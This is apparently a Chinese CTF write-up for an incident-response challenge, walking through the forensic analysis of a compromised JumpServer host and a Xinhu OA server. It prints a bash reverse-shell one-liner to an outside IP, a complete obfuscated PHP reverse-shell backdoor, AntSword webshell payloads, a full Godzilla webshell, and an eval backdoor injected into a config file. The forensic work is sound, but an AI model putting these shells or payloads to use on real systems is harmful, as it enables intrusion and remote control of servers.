2024“中华武数杯” 全国网络攻防精英赛
执着于web安全研究 发表于 湖北 CTF 356浏览 · 2024-11-30 11:10

场景2

弱密码登录

开始是一个jumpserver后台登录尝试弱密码admin/admin123进入
注意不要爆破不然会被禁止30分钟

后门账户

在用户管理页面找到管理用户,发现有两个其中一个是后门账户

黑客后门程序

查看进程和对应端口

ps -aux

找到进程执行反弹shell命令

bash -c bash -i >& /dev/tcp/181.32.44.99/9898 0>&1 &

或者看网络连接

netstat -anlupt

之后再tmp目录找到一个baidu.php后门, 并将混淆代码输出写到了注释里面

<?php
goto xVmgn;
fqEt0:
stream_set_blocking($pipes[0], 0);
goto InVPF;
IeHeL:
proc_close($process);
goto xV3Uc;
gXRc1:
while (1) {
    if (feof($sock)) {
        printit("\x45\122\122\117\x52\x3a\x20\x53\x68\145\x6c\154\40\143\x6f\156\156\145\143\164\x69\x6f\156\x20\x74\145\x72\155\151\x6e\141\x74\x65\x64");
        break;
    }
    if (feof($pipes[1])) {
        printit("\105\x52\122\x4f\x52\72\40\x53\x68\x65\x6c\x6c\x20\x70\x72\x6f\143\145\x73\x73\40\x74\145\x72\155\x69\x6e\141\x74\x65\144");
        break;
    }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        if ($debug) {
            printit("\x53\117\103\113\40\122\105\101\104");
        }
        $input = fread($sock, $chunk_size);
        if ($debug) {
            printit("\x53\x4f\x43\113\x3a\x20{$input}");
        }
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) {
            printit("\x53\124\104\x4f\125\x54\40\122\105\x41\104");
        }
        $input = fread($pipes[1], $chunk_size);
        if ($debug) {
            printit("\123\x54\x44\x4f\x55\124\x3a\x20{$input}");
        }
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) {
            printit("\x53\x54\x44\x45\x52\x52\40\122\105\x41\104");
        }
        $input = fread($pipes[2], $chunk_size);
        if ($debug) {
            printit("\123\x54\x44\x45\x52\x52\x3a\x20{$input}");
        }
        fwrite($sock, $input);
    }
}
goto AZd0U;
rTceL:
#pcntl_fork
if (function_exists("\160\x63\156\164\154\137\146\157\x72\x6b")) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("\x45\x52\122\117\x52\72\40\103\x61\x6e\47\164\40\x66\x6f\x72\x6b");
        die(1);
    }
    if ($pid) {
        die(0);
    }
    if (posix_setsid() == -1) {
        #ERROR: Can't fork
        printit("\x45\x72\x72\x6f\162\72\x20\103\141\x6e\47\164\x20\x73\x65\164\x73\151\x64\x28\51");
        die(1);
    }
    $daemon = 1;
} else { #WARNING: Failed to daemonise.  This is quite common and not fatal.
    printit("\x57\101\122\116\x49\116\x47\72\40\106\141\x69\154\x65\x64\x20\x74\157\40\x64\141\145\x6d\x6f\x6e\151\163\145\x2e\40\40\x54\150\x69\x73\40\x69\x73\x20\161\x75\x69\x74\145\x20\143\x6f\x6d\155\157\156\x20\141\x6e\144\40\x6e\x6f\164\x20\x66\x61\164\x61\x6c\x2e");
}
goto jmHuA;
RlaS8:
if (!$sock) {
    printit("{$errstr}\x20\x28{$errno}\51");
    die(1);
}
goto Uge_Q;
InVPF:
stream_set_blocking($pipes[1], 0);
goto JANIF;
QHXRE: #Successfully opened reverse shell to  : 
printit("\123\x75\143\143\x65\163\163\146\165\154\154\x79\40\157\160\x65\x6e\145\144\40\x72\x65\166\145\162\163\145\x20\163\x68\145\x6c\x6c\x20\164\157\40{$ip}\x3a{$port}");
goto gXRc1;
Zq8k_:
$error_a = null;
goto Wo4xn;
Wo4xn: #uname -a; w; id; bash -i
$shell = "\x75\x6e\x61\x6d\145\x20\x2d\x61\x3b\x20\167\x3b\x20\x69\x64\73\40\142\x61\163\150\x20\x2d\x69";
goto YKN_Y;
r30Sz:
fclose($pipes[1]);
goto O9FZs;
xVmgn:
set_time_limit(0);
goto NGebl;
xcFTT: #ERROR: Can't spawn shell
if (!is_resource($process)) {
    printit("\x45\122\122\x4f\x52\72\x20\103\x61\x6e\x27\164\40\x73\160\141\x77\156\x20\163\x68\x65\x6c\x6c");
    die(1);
}
goto wkPUB;
qcImP: #181.32.44.99
$ip = "\x31\x38\x31\x2e\63\62\56\64\64\56\71\x39";
goto uNuVg;
YKN_Y:
$daemon = 0;
goto BzzaA;
JANIF:
stream_set_blocking($pipes[2], 0);
goto Di1ZG;
Uge_Q: #pipe r
$descriptorspec = array(0 => array("\x70\151\160\145", "\x72"), 1 => array("\160\x69\160\x65", "\x77"), 2 => array("\x70\x69\x70\145", "\167"));
goto PE2Nh;
wkPUB:
function isHttpAlive($ip, $timeout = 2)
{ #http://
    $url = "\150\164\x74\160\x3a\x2f\57{$ip}";
    $context = stream_context_create(array("\150\x74\x74\x70" => array("\164\x69\155\145\x6f\x75\x74" => $timeout)));
    $headers = @get_headers($url, 0, $context);
    if ($headers && strpos($headers[0], "\x32\x30\60")) {
        return true;
    }
    return false;
}
goto fqEt0;
pRr2Z:
$chunk_size = 1400;
goto dSZoi;
NhUwH:
fclose($pipes[0]);
goto r30Sz;
Di1ZG:
stream_set_blocking($sock, 0);
goto QHXRE;
DtngS:
umask(0);
goto xfXIP;
xV3Uc:
function printit($string)
{
    if (!$daemon) {
        print "{$string}\12";
    }
}
goto AObOM;
AZd0U:
fclose($sock);
goto NhUwH;
NGebl:
$VERSION = "\x31\x2e\60";
goto qcImP;
O9FZs:
fclose($pipes[2]);
goto IeHeL;
uNuVg:
$port = 9898;
goto pRr2Z;
xfXIP:
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
goto RlaS8;
PE2Nh:
$process = proc_open($shell, $descriptorspec, $pipes);
goto xcFTT;
BzzaA:
$debug = 0;
goto FhswA;
dSZoi:
$write_a = null;
goto Zq8k_;
FhswA:
if (!isHttpAlive($ip)) {
    die(0);
}
goto rTceL;
jmHuA:
chdir("\x2f");
goto DtngS;
AObOM:

场景一

Vulnerability-Wiki/docs-base/docs/oa/信呼OA-qcloudCosAction.php-任意文件上传漏洞.md at master · Threekiii/Vulnerability-Wiki
CVE-2023-1501

POST /index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=769871 HTTP/1.1


发现请求有代码传入 是CVE-2023-1773

http://39.101.137.133/?p=webmain&d=system&m=cog%7Ccog&ajaxbool=true&a=savecong

原文已经给了修改密码的步骤

后面寻找修改的密码

并且之后rce是将代码写入配置文件webmainConfig.php

流量中的木马命令

第一次传参的RCE代码可以看到如下

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".4fcb9f3038fe";
    @mkdir($tmdir);
    @chdir($tmdir);
    @ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {
        @chdir("..");
    }
    @ini_set("open_basedir", "/");
    @rmdir($ocwd . "/" . $tmdir);
};
function asenc($out)
{
    return $out;
};
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "c8" . "654";
    echo @asenc($output);
    echo "20a81" . "404fc0";
}
ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}  ";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= " ";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= " {$s}";
    echo $R;;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

最终结果突破open_basedir的限制,获取到了当前目录的路径以及用户名和系统信息

第二个解密流量的命令代码如下

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".51d10df2";
    @mkdir($tmdir);
    @chdir($tmdir);
    @ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {
        @chdir("..");
    }
    @ini_set("open_basedir", "/");
    @rmdir($ocwd . "/" . $tmdir);
};
function asenc($out)
{
    return $out;
};
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "151b" . "39961";
    echo @asenc($output);
    echo "a4e4" . "2039d";
}
ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}  ";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= " ";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= " {$s}";
    echo $R;;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

获取到了当前目录的位置以及windows主机名字和用户名
流量中响应结果

151b39961C:/phpstudy_pro/WWW\tC:\tWindows NT OA 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64\tAdministratora4e42039d

第四次

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $oparr = preg_split("/\\\\|\//", $opdir);
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $tmdir = ".3ecc860f";
    @mkdir($tmdir);
    @chdir($tmdir);
    @ini_set("open_basedir", "..");
    for ($i = 0; $i < sizeof($oparr); $i++) {
        @chdir("..");
    }
    @ini_set("open_basedir", "/");
    @rmdir($ocwd . "/" . $tmdir);
};
function asenc($out)
{
    return $out;
};
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "c608" . "8f362";
    echo @asenc($output);
    echo "ef2" . "f47";
}
ob_start();
try {
    echo @fwrite(fopen(base64_decode(substr($_POST["c32fac3bd31b3"], 2)), "w"), base64_decode(substr($_POST["q96d98f37ce4ea"], 2))) ? "1" : "0";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

传参的文件名如下,也就是把内容写入了config.php根据后续访问可以知道是一个哥斯拉木马

C:/phpstudy_pro/WWW/upload/config.php ·
#Halo AntSword!

第五次上传了一个webshell搜索发现是哥斯拉马
哥斯拉PHP马逐句解析 - 芥末炸弹 - 博客园

<?php 
@session_start(); 
@set_time_limit(0); 
@error_reporting(0); 

function encode($D, $K){ 
    for ($i = 0; $i < strlen($D); $i++) { 
        $c = $K[$i + 1 & 15]; 
        $D[$i] = $D[$i] ^ $c; 
    } 
    return $D; 
} 

$pass = 'pass123'; 
$payloadName = 'payload'; 
$key = '63064e0e3090705b'; 

if (isset($_POST[$pass])) { 
    $data = encode(base64_decode($_POST[$pass]), $key); 

    if (isset($_SESSION[$payloadName])) { 
        $payload = encode($_SESSION[$payloadName], $key); 

        if (strpos($payload, "getBasicsInfo") === false) { 
            $payload = encode($payload, $key); 
        } 

        eval($payload); 
        $left = substr(md5($pass . $key), 0, 5); 
        $replacedString = str_replace("bdsek", $left, "var Rebdsek_config="); 
        header('Content-Type: text/html'); 
        echo '<!DOCTYPE html>'; 
        echo '<html lang="en">'; 
        echo $replacedString; 
        echo base64_encode(encode(@run($data),$key)); 
        echo ";"; 
        echo 'document.getElementById("bdshell_js").src = "http://bdimg.share.baidu.com/static/js/shell_v2.js6················5·······························4(························s···········V6···r··`I··B·········X··· ······\· ·'; 
        echo '</body>'; 
        echo '</html>'; 
    } else { 
        if (strpos($data, "getBasicsInfo") !== false) { 
            $_SESSION[$payloadName] = encode($data, $key); 
        } 
    } 
}

pass传入的是远控命令,通过攻击荷载中的run()方法执行远控命令。然后对回显进行加密后传输给哥斯拉的服务端。

D盾扫了一下找到后门config.php和上面流量分析的一致

隐藏后门为webmain\webmainConfig.php也是流量中根据信呼OA的RCE漏洞写入进配置文件的与上面分析的一致

<?php
if(!defined('HOST'))die('not access');
//[
eval($_POST[1]);//]在2024-11-16 19:52:49通过[系统→系统工具→系统设置],保存修改了配置文件
return array(
    'url'   => '',  //系统URL
    'localurl'  => '',  //本地系统URL,用于服务器上浏览地址
    'title' => '信呼协同办公系统',  //系统默认标题
    'apptitle'  => '信呼OA',  //APP上和手机网页版上的标题
    'db_host'   => '127.0.0.1', //数据库地址
    'db_user'   => 'root',  //数据库用户名
    'db_pass'   => 'CaQsC6zVR', //数据库密码
    'db_base'   => 'xinhu', //数据库名称
    'db_engine' => 'MyISAM',
    'perfix'    => 'xinhu_',    //数据库表名前缀
    'qom'   => 'xinhu_',    //session、cookie前缀
    'highpass'  => '',  //超级管理员密码,可用于登录任何帐号
    'db_drive'  => 'mysqli',    //操作数据库驱动有mysql,mysqli,pdo三种
    'randkey'   => 'pcywdgunofzqvsthbmxlraikje',    //系统随机字符串密钥
    'asynkey'   => 'c57fa9c833f4a2c4e208261dddfc9926',  //这是异步任务key
    'openkey'   => '',  //对外接口openkey
    'updir' => 'upload',
    'sqllog'    => false,   //是否记录sql日志保存upload/sqllog下
    'asynsend'  => '',  //是否异步发送提醒消息,0同步,1自己服务端异步,2官网VIP用户异步
    'editpass'  => '',  //用户登录修改密码:0不用修改,1强制用户必须修改
    'install'   => true,    //已安装,不要去掉啊
    'xinhukey'  => '',  //信呼官网key,用于在线升级使用
    'outurl'    => '',  //这个地址当你内网地址访问时向手机推送消息的地址
    'reimtitle' => '',  //REIM即时通信上标题
    'qqmapkey'  => '',
    'platurl'   => '',
    'bcolorxiang'   => '',  //单据详情页面上默认展示线条的颜色
    'officeyl'  => '',  //文档Excel.Doc预览类型,0自己部署插件,1使用官网支持任何平台
    'useropt'   => '',  //1记录用户操作保存到日志里,空不记录
    'defstype'  => '1', //PC后台主题皮肤,可以设置1到34
    'officebj'  => '',  //文档在线编辑,1官网提供或者自己部署
    'officebj_key'  => '',  //文档在线编辑agentkey
    'debug' => false,   //为true调试开发模式,false上线模式
    'reim_show' => false,   //首页是否显示REIM
    'mobile_show'   => false,   //首页是否显示手机版
    'companymode'   => false,   //多单位模式,true就是开启
    'loginyzm'  => '',  //登录方式:0仅使用帐号+密码,1帐号+密码/手机+验证码,2帐号+密码+验证码,3仅使用手机+验证码
    'apptheme'  => '',  //系统或app的主题颜色

);
0 条评论
某人
表情
可输入 255